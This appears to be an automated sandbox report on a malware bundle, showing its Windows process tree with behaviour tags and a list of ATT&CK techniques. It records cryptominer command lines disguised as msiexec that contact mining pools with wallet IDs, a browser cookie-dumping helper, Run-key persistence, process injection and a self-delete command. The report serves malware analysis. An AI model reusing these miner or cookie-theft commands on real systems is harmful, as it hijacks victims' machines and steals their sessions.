"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:1
6⤵
PID:3864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:1
6⤵
PID:3988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
6⤵
PID:512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
6⤵
PID:2808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
6⤵
PID:1844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
6⤵
PID:4592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5388 /prefetch:8
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=6024 /prefetch:8
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:6128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3644 /prefetch:8
6⤵
PID:6244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2396 /prefetch:8
6⤵
PID:6696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1948 /prefetch:8
6⤵
PID:6876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3736 /prefetch:8
6⤵
PID:6996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3972 /prefetch:2
6⤵
PID:7052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1376 /prefetch:8
6⤵
PID:7112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5704 /prefetch:8
6⤵
PID:6236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1460 /prefetch:8
6⤵
PID:1016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3992 /prefetch:8
6⤵
PID:308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2376 /prefetch:8
6⤵
PID:4952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5992 /prefetch:8
6⤵
PID:6484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5880 /prefetch:8
6⤵
PID:5856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=6112 /prefetch:8
6⤵
PID:6636

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\89.259.200\software_reporter_tool.exe
"C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\89.259.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=H+fPqUojgMEqlg5xo5DXtlBchKWHTkCptV0oKP27 --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
6⤵
- Executes dropped EXE
PID:2104

\??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe
c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=89.259.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7a3f7ac28,0x7ff7a3f7ac38,0x7ff7a3f7ac48
7⤵
- Executes dropped EXE
PID:4480

\??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_2104_DEGAORPBXZOLWDXY" --sandboxed-process-id=2 --init-done-notifier=716 --sandbox-mojo-pipe-token=1497895173343420881 --mojo-platform-channel-handle=684 --engine=2
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5708

\??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\89.259.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_2104_DEGAORPBXZOLWDXY" --sandboxed-process-id=3 --init-done-notifier=916 --sandbox-mojo-pipe-token=17658482960456456247 --mojo-platform-channel-handle=912
7⤵
- Executes dropped EXE
PID:6176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3892 /prefetch:8
6⤵
PID:6688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=748 /prefetch:8
6⤵
PID:6812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4840 /prefetch:8
6⤵
PID:6784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2920 /prefetch:8
6⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2928 /prefetch:8
6⤵
PID:6848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2796 /prefetch:8
6⤵
PID:5676

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
4⤵
- Executes dropped EXE
PID:2244

C:\Users\Admin\AppData\Local\Temp\is-OQ57D.tmp\Install.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OQ57D.tmp\Install.tmp" /SL5="$B0286,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2832

C:\Users\Admin\AppData\Local\Temp\is-86JBA.tmp\Ultra.exe
"C:\Users\Admin\AppData\Local\Temp\is-86JBA.tmp\Ultra.exe" /S /UID=burnerch1
6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:4748

C:\Program Files\Windows Portable Devices\XWIZCURLMR\ultramediaburner.exe
"C:\Program Files\Windows Portable Devices\XWIZCURLMR\ultramediaburner.exe" /VERYSILENT
7⤵
- Executes dropped EXE
PID:4660

C:\Users\Admin\AppData\Local\Temp\is-V1DHS.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V1DHS.tmp\ultramediaburner.tmp" /SL5="$20292,281924,62464,C:\Program Files\Windows Portable Devices\XWIZCURLMR\ultramediaburner.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4200

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
9⤵
- Executes dropped EXE
PID:4596

C:\Users\Admin\AppData\Local\Temp\39-ebebe-33e-07eb0-3f96181b58f9d\Bedofufomae.exe
"C:\Users\Admin\AppData\Local\Temp\39-ebebe-33e-07eb0-3f96181b58f9d\Bedofufomae.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:4224

C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5168

C:\Users\Admin\AppData\Roaming\B7E7.tmp.exe
"C:\Users\Admin\AppData\Roaming\B7E7.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5724

C:\Users\Admin\AppData\Roaming\B7E7.tmp.exe
"C:\Users\Admin\AppData\Roaming\B7E7.tmp.exe"
6⤵
PID:5468

C:\Users\Admin\AppData\Roaming\BAC6.tmp.exe
"C:\Users\Admin\AppData\Roaming\BAC6.tmp.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5840

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w25019@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:6068

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w9028 --cpu-max-threads-hint 50 -r 9999
6⤵
- Blocklisted process makes network request
PID:1280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
5⤵
PID:5736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
- Executes dropped EXE
PID:5468

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:5656

C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5644

C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6036

C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5940

C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"
4⤵
- Executes dropped EXE
PID:4644

C:\Users\Admin\AppData\Local\Temp\is-N6N4J.tmp\IrecCH6.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N6N4J.tmp\IrecCH6.tmp" /SL5="$70438,234767,151040,C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5452

C:\Users\Admin\AppData\Local\Temp\is-3PB7P.tmp\player_record_48792.exe
"C:\Users\Admin\AppData\Local\Temp\is-3PB7P.tmp\player_record_48792.exe" /S /UID=irecch6
6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:5852

C:\Program Files\Windows Portable Devices\RTXNOGSPYS\irecord.exe
"C:\Program Files\Windows Portable Devices\RTXNOGSPYS\irecord.exe" /VERYSILENT
7⤵
- Executes dropped EXE
PID:5972

C:\Users\Admin\AppData\Local\Temp\is-U38N9.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U38N9.tmp\irecord.tmp" /SL5="$1701EE,6139911,56832,C:\Program Files\Windows Portable Devices\RTXNOGSPYS\irecord.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:6056

C:\Program Files (x86)\recording\i-record.exe
"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1312

C:\Users\Admin\AppData\Local\Temp\9c-18392-259-85fb0-96d1eb9ff19ef\Wodarihaeqy.exe
"C:\Users\Admin\AppData\Local\Temp\9c-18392-259-85fb0-96d1eb9ff19ef\Wodarihaeqy.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:6096

C:\Users\Admin\AppData\Local\Temp\b0-6b4c9-328-1cd83-24864693c6e71\Qitydaebushy.exe
"C:\Users\Admin\AppData\Local\Temp\b0-6b4c9-328-1cd83-24864693c6e71\Qitydaebushy.exe"
7⤵
- Executes dropped EXE
PID:1496

C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5548

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:3856

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:6228

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:6892

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:1872

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5436

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5484

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5700

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4496

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5096

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5632

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5216

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6376

C:\Users\Admin\AppData\Local\Temp\83F1.exe
C:\Users\Admin\AppData\Local\Temp\83F1.exe
1⤵
- Executes dropped EXE
PID:6508

C:\Users\Admin\AppData\Local\Temp\86FF.exe
C:\Users\Admin\AppData\Local\Temp\86FF.exe
1⤵
- Executes dropped EXE
PID:6560

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6596

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6636

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6652

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:6676

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6736

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6760

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6996

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6660

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6232

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\6b1c4b1706a64700a39c2df572c3c105 /t 5728 /p 6996
1⤵
PID:4892

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5556

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery